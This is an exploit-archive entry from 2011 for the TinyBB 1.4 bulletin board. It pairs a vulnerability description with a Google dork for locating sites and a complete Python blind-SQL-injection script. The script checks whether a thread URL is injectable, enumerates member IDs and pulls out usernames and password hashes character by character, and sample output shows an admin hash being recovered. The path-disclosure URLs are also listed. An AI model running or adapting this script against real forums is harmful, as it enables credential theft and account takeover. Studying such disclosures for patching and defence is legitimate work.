# Exploit Title : TinyBB 1.4 Sql Injection + Path Disclosure # Google Dork : "Proudly powered by TinyBB" # Date : 7 April 2011 # Author : swami # Contact : flavio[dot]baldassi[at]gmail[dot]com # Version : 1.4 # Tested on : Centos 5.5 with magic_quotes_gpc off # Thanks to : ptrace.net # # From tinybb.net # ------------------------- # "TinyBB is a free, simple bulletin board script. TinyBB's community is slowly growing and the number # of installs is slowly rising. TinyBB's software is 100% free and so are our official add-ons." # # Sql Injection [Fixed] # ----------------------- # The vulnerability exist in /inc/viewthread.php file at line 3. As you can see below the $_GET['post'] parameter isn't # properly sanitized. # # $check_thread = mysql_query("SELECT * FROM `tinybb_threads` WHERE # `thread_key` = '$_GET[post]'") or die(mysql_error()); # # Path Disclosure [Not fixed] # -------------------- # A remote user can access these files to cause the system to display an error message that indicates the installation # path. # 1- http://host/inc/login.php # 2- http://host/inc/categories.php # #swami@swami-desktop:~/Documents/py$ ./tinybb.py # # [+] TinyBB thread url: # [?] Set up a Proxy ? [y/n] y # [+] Proxy ip:port: # [+] Proxy is found to be working # [+] Testing url: # [+] Url vulnerable: YES # [+] Users into the db: 1 # [+] Executing blind sql injection, this will take time ... # # [+] UserId 76: admin:64d7103eef2b14bbb2d0b57c38cc3fbee29ff72a # # [+] Done # #!/usr/bin/python # import sys import urllib.request def banner(): print('+ +') print('| ------------------------------ |') print('| TinyBB 1.4 Blind Sql INjector |') print('| ------------------------------ |') print('+ by swami +\n') def setProxy(ip): try: proxy = urllib.request.ProxyHandler( {'http':'http://'+ str(ip) } ) opener = urllib.request.build_opener( proxy ) opener.open('http://www.google.com') print('[+] Proxy is found to be working') except: print('[-] Proxy doesn\'t work') print('[-] Exit ...') sys.exit(1) return opener def testUrl(url, handle): print('[+] Testing url: '+ url) try: req = handle.open( url ) req = req.read().decode('utf-8') except: print('[-] '+ url +' is not a valid url') print('[-] Exit ...') sys.exit(1) return req def urlVulnerable(url, clean, handle): sys.stdout.write('[+] Url vulnerable: ') try: req = handle.open( url + "'" ) req = req.read().decode('utf-8') except: sys.exit('\n[-] Url typing error') if len(clean) > len(req): sys.stdout.write('YES\n') sys.stdout.flush() else: sys.stdout.write('NO\n[-] Exit...\n') sys.stdout.flush() sys.exit(1) def getTrueValue(url, handle): trueValue = handle.open( url + "'%20and%20'1'='1" ) return len( trueValue.read().decode('utf-8') ) def getNUsers(url, trueValue, handle): users = list() sys.stdout.write('[+] Users into the db: ') sys.stdout.flush() for userid in range(1,100): inject = url + "'%20and%20(SELECT%201%20FROM%20members%20WHERE%20id="+ str(userid) +")='1" try: req = handle.open( inject ) req = req.read().decode('utf-8') except: print('[-] Somenthing went wrong') sys.exit(1) if len(req) == trueValue: users.append(userid) sys.stdout.write( str(len(users)) ) return users def doBlind(url, handle, nUserId, trueValue): print('\n[+] Executing blind sql injection, this will take time ...\n') for x in range(len(nUserId)): position = 1 # Line position userid = nUserId[x] char = 33 # Start from ! sys.stdout.write('[+] UserId '+ str(userid) +': ') sys.stdout.flush() # Execute Blind Sql INjection while True: inject = url inject += "'%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20FROM%20" inject += "members%20WHERE%20id="+ str(userid) +"),"+ str(position) +",1))>"+ str(char) +"%20--'" result = handle.open( inject ) result = result.read().decode('utf-8') # If we don't get errors if len(result) == trueValue: char += 1 else: if position > 43 and chr(char) == "!": break else: sys.stdout.write( chr(char) ) sys.stdout.flush() position += 1 char = 33 #Reset char if char == 127 : print('[-] Ascii table is over. Exit... :/') sys.exit(1) print() if __name__ == "__main__": banner() url = input('[+] TinyBB thread url: ') if input('[?] Set up a Proxy ? [y/n] ') == 'y' : handle = setProxy( input('[+] Proxy ip:port: ') ) else: handle = urllib.request.build_opener() clean = testUrl(url, handle) urlVulnerable(url, clean, handle) trueValue = getTrueValue(url, handle) userId = getNUsers(url, trueValue, handle) doBlind(url, handle, userId, trueValue) print('\n[+] Done ')